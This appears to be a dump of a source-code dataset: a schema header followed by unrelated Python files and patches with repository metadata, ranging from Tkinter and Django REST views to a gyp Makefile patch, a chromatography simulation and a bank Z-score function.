hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0c3eba736f647bf4da4d0331426a996dececb82e
| 662 |
py
|
Python
|
globals/browsers.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2016-01-29T18:05:29.000Z
|
2021-10-06T04:21:55.000Z
|
globals/browsers.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2015-04-06T19:03:32.000Z
|
2019-05-28T13:34:55.000Z
|
globals/browsers.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 18 |
2015-04-06T17:42:31.000Z
|
2021-10-06T04:26:29.000Z
|
browsers = [
{
'id': 'chrome',
'name': 'Chrome'
},
{
'id': 'chromium',
'name': 'Chromium'
},
{
'id': 'firefox',
'name': 'Firefox'
},
{
'id': 'safari',
'name': 'Safari'
},
{
'id': 'msie',
'name': 'Internet Explorer'
},
{
'id': 'msedge',
'name': 'Microsoft Edge'
},
{
'id': 'opera',
'name': 'Opera'
},
{
'id': 'yandexbrowser',
'name': 'Yandex.Browser'
},
{
'id': 'ios',
'name': 'iOS'
},
{
'id': 'android',
'name': 'Android'
},
{
'id': 'samsungBrowser',
'name': 'Samsung Internet'
}
]
| 13.791667 | 32 | 0.380665 |
a76cedf207ceaf1dba4e55be50b4825c950cf26b
| 282 |
py
|
Python
|
python_gui_tkinter/Tkinter/TkinterCourse/31_img.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/Tkinter/TkinterCourse/31_img.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/Tkinter/TkinterCourse/31_img.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
from tkinter import *
canvas_width = 1200
canvas_height = 700
master = Tk()
canvas = Canvas(master,
width=canvas_width,
height=canvas_height)
canvas.pack()
img = PhotoImage(file="python1.png")
canvas.create_image(20,20, anchor=NW, image=img)
mainloop()
| 16.588235 | 48 | 0.687943 |
ac6c41a6e70911398c2e4b2ef3e3cdf63f92af8e
| 284 |
py
|
Python
|
pacman-arch/test/pacman/tests/epoch001.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/epoch001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/epoch001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Sysupgrade with a sync package having higher epoch"
sp = pmpkg("dummy", "1:1.0-1")
self.addpkg2db("sync", sp)
lp = pmpkg("dummy", "1.1-1")
self.addpkg2db("local", lp)
self.args = "-Su"
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_VERSION=dummy|1:1.0-1")
| 21.846154 | 71 | 0.68662 |
5a743522463540cb50f845c916172aa0aeb13ce3
| 1,156 |
py
|
Python
|
src/python3_learn_video/object_introduce.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/object_introduce.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/object_introduce.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
"""
对象 = 属性 + 方法
"""
class Turtle: # Python 中的类名约定以大写字母开头
"""关于类的一个简单例子"""
# 属性
color = 'green'
weight = 10
legs = 4
shell = True
mouth = '大嘴'
# 方法
def climb(self):
print('我正在很努力的向前爬....')
def run(self):
print('我正在快速的向前跑.....')
def bite(self):
print('咬你......')
def eat(self):
print('有的吃......')
def sleep(self):
print('困了,睡了......')
"""
tt = Turtle
print(tt)
tt1 = Turtle()
print(tt1)
tt.bite('')
"""
# 面向对象特性1:封装
print('------------------------------------------')
list1 = [2, 1, 7, 5, 3]
list1.sort()
print(list1)
list1.append(9)
print(list1)
print('------------------------------------------')
# 面向对象特性2:继承
# 子类自动共享父类之间数据和方法的机制
class MyList(list):
pass
list2 = MyList()
list2.append(5)
list2.append(3)
list2.append(7)
print(list2)
list2.sort()
print(list2)
print('------------------------------------------')
# 面向对象特性3:多态
class A:
def fun(self):
print('我是小A...')
class B:
def fun(self):
print('我是小B...')
a = A()
b = B()
a.fun()
b.fun()
print('------------------------------------------')
| 13.6 | 51 | 0.439446 |
b2d8c07d3c9158693e0174a80f7ca8a486fcee1e
| 5,573 |
py
|
Python
|
Packs/CircleCI/Integrations/CircleCI/CircleCI_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CircleCI/Integrations/CircleCI/CircleCI_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CircleCI/Integrations/CircleCI/CircleCI_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import io
import json
import pytest
from typing import Tuple, Dict
from CircleCI import Client, circleci_workflows_list_command, circleci_artifacts_list_command, \
circleci_workflow_jobs_list_command, circleci_workflow_last_runs_command, DEFAULT_LIMIT_VALUE
from CommonServerPython import CommandResults
fake_client = Client('', '', False, False, '', '', '')
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
test_data = util_load_json('test_data/circle_ci_commands_test_data.json')
@pytest.mark.parametrize('command_func, func_name',
[(circleci_workflows_list_command, 'get_workflows_list'),
(circleci_artifacts_list_command, 'get_job_artifacts'),
(circleci_workflow_jobs_list_command, 'get_workflow_jobs'),
(circleci_workflow_last_runs_command, 'get_last_workflow_runs')])
def test_circleci_commands(mocker, command_func, func_name):
"""
Given:
- 'args': XSOAR arguments
When:
- Executing a CircleCI command.
Then:
- Ensure expected CommandResults object is returned.
"""
command_test_data = test_data[func_name]
mocker.patch.object(fake_client, func_name, return_value=command_test_data['response'])
result: CommandResults = command_func(fake_client, dict())
assert result.outputs_prefix == command_test_data['outputs_prefix']
assert result.outputs_key_field == command_test_data['outputs_key_field']
assert result.outputs == command_test_data['outputs']
GET_COMMON_ARGUMENTS_INPUTS = [(Client('', '', False, False, vc_type='a', organization='b', project='c'), dict(),
('a', 'b', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x'}, ('x', 'b', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x'}, ('a', 'x', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'project': 'x'}, ('a', 'b', 'x', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'limit': 1}, ('a', 'b', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'limit': 1}, ('x', 'b', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x', 'limit': 1}, ('a', 'x', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'project': 'x', 'limit': 1}, ('a', 'b', 'x', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y'}, ('x', 'y', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'project': 'y'}, ('x', 'b', 'y', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x', 'project': 'y'}, ('a', 'x', 'y', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y', 'project': 'z'},
('x', 'y', 'z', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y', 'limit': 1},
('x', 'y', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'project': 'y', 'limit': 1},
('x', 'b', 'y', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x', 'project': 'y', 'limit': 1},
('a', 'x', 'y', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y', 'project': 'z', 'limit': 1},
('x', 'y', 'z', 1)),
]
@pytest.mark.parametrize('client, args, expected', GET_COMMON_ARGUMENTS_INPUTS)
def test_get_common_arguments(client: Client, args: Dict, expected: Tuple[str, str, str, int]):
"""
Given:
- XSOAR arguments
When:
- Extracting common used args for few commands.
Then
- Ensure the common commands are extracted as expected, and uses default value of instance parameter if not found.
"""
from CircleCI import get_common_arguments
assert get_common_arguments(client, args) == expected
| 55.73 | 118 | 0.499372 |
336f1b7a21506cfec58038472545773c94776183
| 6,053 |
py
|
Python
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-pylib_gyp_generator_make.py,v 1.4 2014/08/25 13:20:12 fhajny Exp $
Force platform libtool na Darwin, see
https://code.google.com/p/gyp/issues/detail?id=354&q=libtool
Also, don't try to use thin archives on NetBSD, they appear not to work
("ar t <archive>" says "Malformed archive").
--- pylib/gyp/generator/make.py.orig 2014-07-14 14:19:49.000000000 +0000
+++ pylib/gyp/generator/make.py
@@ -167,9 +167,83 @@ quiet_cmd_solink_module = SOLINK_MODULE(
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
"""
+LINK_COMMANDS_NETBSD = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
+LINK_COMMANDS_SOLARIS = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
LINK_COMMANDS_MAC = """\
quiet_cmd_alink = LIBTOOL-STATIC $@
-cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
+cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool /usr/bin/libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
@@ -350,7 +424,7 @@ sed -e "s|^$(notdir $@)|$@|" $(depfile).
# We remove slashes and replace spaces with new lines;
# remove blank lines;
# delete the first line and append a colon to the remaining lines.
-sed -e 's|\\||' -e 'y| |\n|' $(depfile).raw |\
+env NL=`printf "\n"` sed -e 's|\\||' -e 's| |${NL}|g' $(depfile).raw |\
grep -v '^$$' |\
sed -e 1d -e 's|$$|:|' \
>> $(depfile)
@@ -2044,6 +2118,7 @@ def GenerateOutput(target_list, target_d
header_params.update({
'flock': './gyp-flock-tool flock',
'flock_index': 2,
+ 'link_commands': LINK_COMMANDS_SOLARIS,
})
elif flavor == 'freebsd':
# Note: OpenBSD has sysutils/flock. lockf seems to be FreeBSD specific.
@@ -2056,6 +2131,11 @@ def GenerateOutput(target_list, target_d
'flock': './gyp-flock-tool flock',
'flock_index': 2,
})
+ elif flavor == 'netbsd':
+ header_params.update({
+ 'link_commands': LINK_COMMANDS_NETBSD,
+ })
+
header_params.update({
'CC.target': GetEnvironFallback(('CC_target', 'CC'), '$(CC)'),
| 48.424 | 181 | 0.660995 |
682006cc2da0265d494def28096008e59c9efc4d
| 257 |
py
|
Python
|
AFluentPython/process_thread/multiprocess.py
|
RoboCuper-hujinlei/AI-Job
|
cf7a081d59700d75f0f2dc73b6d5130863796f01
|
[
"Apache-2.0"
] | null | null | null |
AFluentPython/process_thread/multiprocess.py
|
RoboCuper-hujinlei/AI-Job
|
cf7a081d59700d75f0f2dc73b6d5130863796f01
|
[
"Apache-2.0"
] | null | null | null |
AFluentPython/process_thread/multiprocess.py
|
RoboCuper-hujinlei/AI-Job
|
cf7a081d59700d75f0f2dc73b6d5130863796f01
|
[
"Apache-2.0"
] | null | null | null |
"""
python multiprocessing 跨平台多进程模块
"""
from multiprocessing import Process
import os
def run_proc(name):
print(f'Run child process {name}: ({os.getpid()})...')
# run_proc('th1')
if __name__ == '__main__':
print(f'Parent process: {os.getpid()}')
| 18.357143 | 58 | 0.673152 |
68478ff3680d97ad6b7fff54608144d9b26e853e
| 2,047 |
py
|
Python
|
backend/products/views.py
|
saulhappy/drf
|
5e62da54cdf0f0fead742c891d34e7eacd488a1b
|
[
"MIT"
] | null | null | null |
backend/products/views.py
|
saulhappy/drf
|
5e62da54cdf0f0fead742c891d34e7eacd488a1b
|
[
"MIT"
] | null | null | null |
backend/products/views.py
|
saulhappy/drf
|
5e62da54cdf0f0fead742c891d34e7eacd488a1b
|
[
"MIT"
] | null | null | null |
from requests import request
from rest_framework import generics, permissions
from api.mixins import StaffEditorPermissionMixin, UserQuerySetMixin
from products.models import Product
from products.serializers import ProductSerializer
class ProductDetailAPIView(
UserQuerySetMixin, generics.RetrieveAPIView, StaffEditorPermissionMixin
):
queryset = Product.objects.all()
serializer_class = ProductSerializer
class ProductListCreateAPIView(
UserQuerySetMixin, StaffEditorPermissionMixin, generics.ListCreateAPIView
):
queryset = Product.objects.all()
serializer_class = ProductSerializer
def perform_create(self, serializer):
title = serializer.validated_data.get("title")
content = serializer.validated_data.get("content") or None
if content is None:
content = title
serializer.save(content=content, user=self.request.user)
# now UserQuerySetMixin does this role
# def get_queryset(self):
# qs = super().get_queryset()
# request = self.request
# user = self.request.user
# if not user.is_authenticated:
# return Product.objects.none()
# return qs.filter(user=request.user)
product_list_create_view = ProductListCreateAPIView.as_view()
class ProductUpdateAPIView(
UserQuerySetMixin, generics.UpdateAPIView, StaffEditorPermissionMixin
):
queryset = Product.objects.all()
serializer_class = ProductSerializer
lookup_field = "pk"
def perform_update(self, serializer):
instance = serializer.save()
if not instance.content:
instance.content = instance.title
product_update_view = ProductUpdateAPIView.as_view()
class ProductDestroyAPIView(
UserQuerySetMixin, generics.DestroyAPIView, StaffEditorPermissionMixin
):
queryset = Product.objects.all()
serializer_class = ProductSerializer
lookup_field = "pk"
def perform_update(self, instance):
super().perform_destroy(instance)
product_delete_view = ProductDestroyAPIView.as_view()
| 29.666667 | 77 | 0.740107 |
04587c005a73d1b54891b78c8cea19137fd9377b
| 2,001 |
py
|
Python
|
Calculation/calculation_with_D.py
|
Tocha4/-Displacement--Chromatography
|
0baf4f9e2d23b39f610217b048d799c6403a259e
|
[
"MIT"
] | 2 |
2020-11-25T07:53:48.000Z
|
2021-09-19T14:19:51.000Z
|
Calculation/calculation_with_D.py
|
Tocha4/-Displacement--Chromatography
|
0baf4f9e2d23b39f610217b048d799c6403a259e
|
[
"MIT"
] | null | null | null |
Calculation/calculation_with_D.py
|
Tocha4/-Displacement--Chromatography
|
0baf4f9e2d23b39f610217b048d799c6403a259e
|
[
"MIT"
] | null | null | null |
import time
import numpy as np
from column_01 import Column
from pump_01 import Pump
from sample_01 import Sample
from interaction_01 import Interaction
from calculation_current import Simu
import os
print(os.listdir())
if 'functions_with_D' in os.listdir():
from functions_with_D import Functions
else:
from Calculation.functions_with_D import Functions
class Simu_with_D(Simu):
def simulation(self):
const1 = -(self.Column.dz/(self.Column.dt*self.Column.velocity))
F = self.Column.F*const1
const1_1 = 1+const1
inter = list(self.Interaction.ads_max*self.Interaction.adsorption)
qq, cc = Functions.simulation_with_D(self.num_time_steps, self.num_length_steps,
self.Interaction.adsorption,
self.C,len(self.num_components),
self.q,inter,const1_1,const1,F)
self.q = np.array(qq)
self.C = np.array(cc)
return self.q,self.C
# def __init__(self,Sample,Column,Interaction, Pump, time_factor=1 ):
# super().__init__(Sample,Column,Interaction, Pump, time_factor=1 )
# print(self.Sample.a)
if __name__=='__main__':
n = 3
a = time.time()
sample = Sample(volume=0.1 , composition=np.ones(n)/n, concentration=1,
a=np.linspace(1,40,n), adsorption_max=np.linspace(0.025,0.04,n))
sample.disp_concentration = [0 for _ in range(n)]
sample.disp_concentration[-1] = 0.025
pump = Pump(1)
column = Column([1,20], 5*10**(-3), 0.635,pump, CFL=0.35)
interaction = Interaction(sample)
sim = Simu_with_D(sample,column,interaction,pump,time_factor=1)
#%%
sim.injection()
#%%
sim.simulation()
# q = np.array(q)
# C = np.array(C)
b = time.time()
Ausgabe = 'für {} Punkte braucht das Programm {} Sekunden'.format(np.product( sim.C.shape),(b-a))
print(Ausgabe)
| 31.761905 | 101 | 0.616692 |
501d4569b58f1c43016a07aee0dd51437c1d48ce
| 351 |
py
|
Python
|
exercises/pt/solution_02_10_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/solution_02_10_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/solution_02_10_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
import spacy
nlp = spacy.load("pt_core_news_md")
doc = nlp("Visitamos um excelente restaurante. Em seguida fomos a um ótimo bar.")
# Crie partições para "excelente restaurante" e "ótimo bar"
span1 = doc[2:4]
span2 = doc[10:12]
print(span1)
print(span2)
# Obtenha a similaridade das partições
similarity = span1.similarity(span2)
print(similarity)
| 21.9375 | 81 | 0.754986 |
a8778a2d8f225995842a7529f1610fcb2971dcff
| 501 |
py
|
Python
|
doc/examples/packages/package_cythran/package_cythran/calcul.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/examples/packages/package_cythran/package_cythran/calcul.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/examples/packages/package_cythran/package_cythran/calcul.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import numpy as np
from transonic import boost, Type, Array, NDim, set_backend_for_this_module
set_backend_for_this_module("pythran")
T = Type(np.int32, np.float64, np.float32)
A = Array[T, NDim(2)]
@boost
def laplace(image: A):
"""Laplace operator in NumPy for 2D images."""
laplacian = (
image[:-2, 1:-1]
+ image[2:, 1:-1]
+ image[1:-1, :-2]
+ image[1:-1, 2:]
- 4 * image[1:-1, 1:-1]
)
thresh = np.abs(laplacian) > 0.05
return thresh
| 21.782609 | 75 | 0.588822 |
a8ae472868a80064b156a405655f56ad60391a28
| 433 |
py
|
Python
|
Webpage/blog/forms.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
Webpage/blog/forms.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | 46 |
2022-01-08T12:03:24.000Z
|
2022-03-30T08:51:05.000Z
|
Webpage/blog/forms.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
from django.forms import ModelForm
from django.core.exceptions import ValidationError
from django.forms import fields
from django.utils.translation import ugettext_lazy as _
from phonenumber_field.formfields import PhoneNumberField
from tinymce.widgets import TinyMCE
from .models import blogPost
class newBlogEntry(ModelForm):
class Meta:
model = blogPost
fields = ['titel', 'text']
| 25.470588 | 57 | 0.789838 |
508b6d222804fc63d4cc0b8698c950410b3c8c75
| 2,578 |
py
|
Python
|
frds/measures/func_bank_z_score.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 31 |
2020-06-17T13:19:12.000Z
|
2022-03-27T08:56:38.000Z
|
frds/measures/func_bank_z_score.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | null | null | null |
frds/measures/func_bank_z_score.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 8 |
2020-06-14T15:21:51.000Z
|
2021-09-29T06:28:53.000Z
|
import numpy as np
def z_score(roa: float, capital_ratio: float, past_roas: np.ndarray) -> float:
r"""Z-score
A measure of bank insolvency risk, defined as:
$$
\text{Z-score} = \frac{\text{ROA}+\text{CAR}}{\sigma_{\text{ROA}}}
$$
where $\text{ROA}$ is the bank's ROA, $\text{CAR}$ is the bank's capital ratio and $\sigma_{\text{ROA}}$
is the standard deviation of bank ROA.
The rationale behind Z-score is simple. A bank is insolvent when its loss $-\pi$ exceeds equity $E$, i.e., $-\pi>E$.
The probability of insolvency is $P(-\pi>E)$.
If bank assets is $A$, then $P(-\pi>E)=P(-\frac{\pi}{A}>\frac{E}{A})=P(-ROA>CAR)$.
Assuming profits are normally distributed, then scaling $(\text{ROA}+\text{CAR})$ by $\sigma_{\text{ROA}}$ yields an
estimate of the distance to insolvency.
A higher Z-score implies that larger shocks to profitability are required to cause the losses to exceed bank equity.
Args:
roa (float): the current bank ROA.
capital_ratio (float): the current bank equity to asset ratio.
past_roas (np.ndarray): (n_periods,) array of past bank ROAs used to calculate the standard deviation.
Returns:
float: The bank's Z-score
Examples:
>>> from frds.measures.bank import z_score
>>> import numpy as np
>>> z_score(roa=0.2, capital_ratio=0.5, past_roas=np.array([0.1,0.2,0.15,0.18,0.2]))
18.549962900111296
References:
* [Laeven and Levine (2009)](https://doi.org/10.1016/j.jfineco.2008.09.003),
Bank governance, regulation and risk taking, *Journal of Financial Economics*, 93, 2, 259-275.
* [Houston, Lin, Lin and Ma (2010)](https://doi.org/10.1016/j.jfineco.2010.02.008),
Creditor rights, information sharing, and bank risk taking, *Journal of Financial Economics*, 96, 3, 485-512.
* [Beck, De Jonghe, and Schepens (2013)](https://doi.org/10.1016/j.jfi.2012.07.001),
Bank competition and stability: cross-country heterogeneity, *Journal of Financial Intermediation*, 22, 2, 218-244.
* [Delis, Hasan, and Tsionas (2014)](https://doi.org/10.1016/j.jbankfin.2014.03.024),
The risk of financial intermediaries, *Journal of Banking & Finance*, 44, 1-12.
